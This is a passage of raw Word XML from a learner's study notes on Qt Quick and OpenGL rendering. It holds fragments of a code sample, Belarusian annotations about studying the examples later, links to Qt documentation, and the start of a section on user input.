      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0035792D" w:rsidRPr="0035792D" w:rsidRDefault="0035792D" w:rsidP="0035792D">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35792D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w: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HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0035792D" w:rsidRPr="0035792D" w:rsidRDefault="0035792D" w:rsidP="0035792D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Then we overlay a short descriptive text, so that it is clearly visible that we are in fact rendering OpenGL under our Qt Quick scene.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00555E67" w:rsidRPr="00FC5A43" w:rsidRDefault="00FC5A43" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC5A43">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">Прыклад я ў цэлым зразумеў, але код яго логікі я пакуль няздольны разумець. У агульным, як маляваць праз </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC5A43">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qt</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC5A43">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>, я добра занатаваў.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC5A43" w:rsidRPr="00165D8F" w:rsidRDefault="00165D8F" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165D8F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00165D8F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">лепей засвою, калі вывучу </w:t>
      </w:r>
      <w:r w:rsidRPr="00165D8F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OpenGL</w:t>
      </w:r>
      <w:r w:rsidRPr="00165D8F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B34EC9" w:rsidRPr="00CF3A01" w:rsidRDefault="00490E7E" w:rsidP="00FC5A43">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2188" w:history="1">
        <w:r w:rsidR="00FC5A43" w:rsidRPr="00D309FA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http</w:t>
        </w:r>
        <w:r w:rsidR="00FC5A43" w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>://</w:t>
        </w:r>
        <w:r w:rsidR="00FC5A43" w:rsidRPr="00D309FA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>doc</w:t>
        </w:r>
        <w:r w:rsidR="00FC5A43" w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="00FC5A43" w:rsidRPr="00D309FA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qt</w:t>
        </w:r>
        <w:r w:rsidR="00FC5A43" w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="00FC5A43" w:rsidRPr="00D309FA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>io</w:t>
        </w:r>
        <w:r w:rsidR="00FC5A43" w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidR="00FC5A43" w:rsidRPr="00D309FA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qt</w:t>
        </w:r>
        <w:r w:rsidR="00FC5A43" w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>-5/</w:t>
        </w:r>
        <w:r w:rsidR="00FC5A43" w:rsidRPr="00D309FA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qtquick</w:t>
        </w:r>
        <w:r w:rsidR="00FC5A43" w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="00FC5A43" w:rsidRPr="00D309FA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>scenegraph</w:t>
        </w:r>
        <w:r w:rsidR="00FC5A43" w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="00FC5A43" w:rsidRPr="00D309FA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>textureinsgnode</w:t>
        </w:r>
        <w:r w:rsidR="00FC5A43" w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="00FC5A43" w:rsidRPr="00D309FA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>example</w:t>
        </w:r>
        <w:r w:rsidR="00FC5A43" w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="00FC5A43" w:rsidRPr="00D309FA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00FC5A43" w:rsidRPr="00E1272F" w:rsidRDefault="00490E7E" w:rsidP="00FC5A43">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2189" w:history="1">
        <w:r w:rsidR="00FC5A43" w:rsidRPr="00D309FA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http</w:t>
        </w:r>
        <w:r w:rsidR="00FC5A43" w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>://</w:t>
        </w:r>
        <w:r w:rsidR="00FC5A43" w:rsidRPr="00D309FA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>doc</w:t>
        </w:r>
        <w:r w:rsidR="00FC5A43" w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="00FC5A43" w:rsidRPr="00D309FA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qt</w:t>
        </w:r>
        <w:r w:rsidR="00FC5A43" w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="00FC5A43" w:rsidRPr="00D309FA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>io</w:t>
        </w:r>
        <w:r w:rsidR="00FC5A43" w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidR="00FC5A43" w:rsidRPr="00D309FA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qt</w:t>
        </w:r>
        <w:r w:rsidR="00FC5A43" w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>-5/</w:t>
        </w:r>
        <w:r w:rsidR="00FC5A43" w:rsidRPr="00D309FA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qtquick</w:t>
        </w:r>
        <w:r w:rsidR="00FC5A43" w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="00FC5A43" w:rsidRPr="00D309FA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>scenegraph</w:t>
        </w:r>
        <w:r w:rsidR="00FC5A43" w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="00FC5A43" w:rsidRPr="00D309FA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>textureinthread</w:t>
        </w:r>
        <w:r w:rsidR="00FC5A43" w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="00FC5A43" w:rsidRPr="00D309FA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>example</w:t>
        </w:r>
        <w:r w:rsidR="00FC5A43" w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="00FC5A43" w:rsidRPr="00D309FA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00FC5A43">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC5A43" w:rsidRDefault="00CF3A01" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">два гэтыя прыклады напісаны без тлумачэння. Іх буду вывучаць пасля таго, як засвою </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OpenGL</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3A01" w:rsidRDefault="00CF3A01" w:rsidP="00CF3A01">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Reference - </w:t>
      </w:r>
      <w:hyperlink r:id="rId2190" w:history="1">
        <w:r w:rsidRPr="00AD5879">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qtquick-index.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00CF3A01" w:rsidRDefault="00490E7E" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2191" w:history="1">
        <w:r w:rsidR="00CF3A01" w:rsidRPr="000B77C6">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qtquick-input-topic.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00CF3A01" w:rsidRPr="00CF3A01" w:rsidRDefault="00CF3A01" w:rsidP="00B82406">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1822" w:name="_Toc483000925"/>
      <w:bookmarkStart w:id="1823" w:name="_Toc483003916"/>
      <w:bookmarkStart w:id="1824" w:name="_Toc483604268"/>
      <w:bookmarkStart w:id="1825" w:name="_Toc483605488"/>
      <w:r w:rsidRPr="00B82406">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Important Concepts In Qt Quick - User Input</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1822"/>
      <w:bookmarkEnd w:id="1823"/>
      <w:bookmarkEnd w:id="1824"/>
      <w:bookmarkEnd w:id="1825"/>
    </w:p>
    <w:p w:rsidR="00CF3A01" w:rsidRPr="00CF3A01" w:rsidRDefault="00CF3A01" w:rsidP="00CF3A01">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Being able to respond to user-input</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fundamental part of user-interface design</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Depending on the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>use-case</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> that an application solves, and the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>form-factor of the device</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> that the application runs on, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>best way</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to receive user-input may be </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>different</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3A01" w:rsidRPr="00CF3A01" w:rsidRDefault="00CF3A01" w:rsidP="00B82406">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1826" w:name="touch"/>
      <w:bookmarkStart w:id="1827" w:name="_Toc483000926"/>
      <w:bookmarkStart w:id="1828" w:name="_Toc483003917"/>
      <w:bookmarkStart w:id="1829" w:name="_Toc483604269"/>
      <w:bookmarkStart w:id="1830" w:name="_Toc483605489"/>
      <w:bookmarkEnd w:id="1826"/>
      <w:r w:rsidRPr="00B82406">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Touch</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1827"/>
      <w:bookmarkEnd w:id="1828"/>
      <w:bookmarkEnd w:id="1829"/>
      <w:bookmarkEnd w:id="1830"/>
    </w:p>
    <w:p w:rsidR="00CF3A01" w:rsidRPr="00CF3A01" w:rsidRDefault="00CF3A01" w:rsidP="00CF3A01">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
